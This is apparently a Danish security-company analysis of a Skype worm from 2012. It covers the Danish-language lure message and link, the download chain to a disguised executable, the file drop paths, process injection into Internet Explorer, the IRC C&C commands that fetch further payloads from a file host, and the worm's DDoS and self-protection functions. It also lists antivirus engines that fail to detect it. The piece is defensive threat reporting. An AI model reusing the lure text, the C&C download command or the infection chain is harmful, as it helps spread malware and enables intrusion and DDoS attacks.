En "orm" spreder sig for øjeblikket via Skype. Den har inkluderet et dansk sprog modul der gør den i stand til at tale "dansk".
Den spreder sig med følgende ordlyd (mellemrum indlagt af CSIS):
”ggggg du ser vanvittigt på dette billede http://g oo.gl/AVzL8?img=[%skype navn%]”
Hvis en Skype bruger vælger at klikke på det medfølgende link hentes den skadelige komponent via "sendspace". Bemærk, at der anvendes mange forskellige URLs til formålet. Trafikmønster findes herunder:
http://go o.gl/AVzL8
--> http://www.send space.com/pro/dl/m02hjf
--> "foto 18.11.2012 profile.zip" -->
foto 18.11.2012 profile.exe (MD5: b93a552918f5c1d4dda49bd58db3dd49)
Vi kan se at denne kode allerede har opnået en pæn udbredelse i Europa med flere end 2000 kliks alene fra Danmark.
Hvis den pågældende zip fil udpakkes og køres vil denne malware kopiere sig til harddisken:
C:Users[%brugerkonto%]AppDataRoamingHgasaz.exe
C:Users[%brugerkonto%]AppDataRoaming4BC7.exe
Den pågældende sti er statisk og bestemmes via "SHGetSpecialFolderPathW".
Når vi kigger på hovedkomponenten står det hurtigt klar at denne malware er yderst frisk: [Mon Nov 19 04:07:37 2012 UTC]. Den injekter sig ved kørsel i iexplore.exe processen:
004068C6 push 00411728h UTF-16 "Internet Exploreriexplore.exe" xref: 004068C3
004068CB push 00449E78h UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068D0 call dword ptr [00411240h] PathAppendW@SHLWAPI.DLL (Import)
004068D6 mov eax, 00449E78h UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068DB ret function end
Der downloades supplerende malware via en HTTP GET som defineres igennem en IRC kanal:
GET /dl/179970419/a8fcb14/0028492385y34857.html HTTP/1.1
User-Agent: Mozilla/4.0
Host: hotfile.com
GET /get/3a3d254720f0d0c9ecbf8cf42a98c15eb4f31bfc/50a9f9f4/2/2a5febb05141e137/aba2173/0028492385y34857 HTTP/1.1
User-Agent: Mozilla/4.0
Host: s149.hotfile.com
Connection: Keep-Alive
Cookie: ip=77.87
HTTP/1.1 200 OK
Server: Hotfile Server v0.2
Date: Mon, 19 Nov 2012 09:20:54 GMT
Content-Type: application/octet-stream
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 55296
Content-Disposition: attachment; filename="0028492385y34857"
Content-Transfer-Encoding: binary
Connection: close
Som tidligere nævnt anvender denne malware en IRC server til C&C funktioner (den aktuelle findes på "photobeat.su", men vi har blokeret flere i CSIS Secure DNS):
!j -c BE,DK,FI,FR,GR,HR,HU,IE,NO,PL,RO,SK #gi
Channel: #gi
* Topic for #gi is: !dl http://hotfile.com/dl/[unikt id]
En af funktionerne i denne kode er at kunne igangsætte DDoS angreb mod definerede mål.
push 00415E8Ch ASCII "[UDP]: Starting flood on "%s:%d" for %d second(s)"
push 00415EC0h ASCII "[UDP]: Finished flood on "%s:%d"
Det pågældende modul til DDoS ser ud til at være baseret på "Slowloris":
{sl0wl0riS}- Started fl00ding! "%s" FOR %d MinUt3{s}, va: 00415E30
[Slowloris]: Finished flood on "%s", va: 00415E68
Denne "orm" indeholder endvidere en selvbeskyttende funktion som genoptager processen såfremt den dræbes "%s.Protect "%s" against file removal done!!"
Antivirus detektion er ikke eksisterende:
Agnitum - 20121116
AntiVir - 20121116
Antiy-AVL - 20121116
Avast - 20121116
AVG - 20121115
BitDefender - 20121116
CAT-QuickHeal - 20121116
ClamAV - 20121115
Commtouch - 20121116
Comodo - 20121116
DrWeb - 20121116
Emsisoft - 20121116
eSafe - 20121115
ESET-NOD32 - 20121116
F-Prot - 20121116
F-Secure - 20121116
Fortinet - 20121116
GData - 20121116
Ikarus - 20121116
Jiangmin - 20121116
K7AntiVirus - 20121115
Kaspersky - 20121116
Kingsoft - 20121112
McAfee - 20121116
McAfee-GW-Edition - 20121116
Microsoft - 20121116
MicroWorld-eScan - 20121116
Norman - 20121116
nProtect - 20121116
Panda - 20121116
PCTools - 20121116
Rising - 20121116
Sophos - 20121116
SUPERAntiSpyware - 20121116
Symantec WS.Reputation.1 20121116
TheHacker - 20121113
TotalDefense - 20121115
TrendMicro - 20121116
TrendMicro-HouseCall - 20121116
VBA32 - 20121115
VIPRE - 20121116
ViRobot - 20121116
↧
CSIS Nyheder: Giftig Skype "Orm"
↧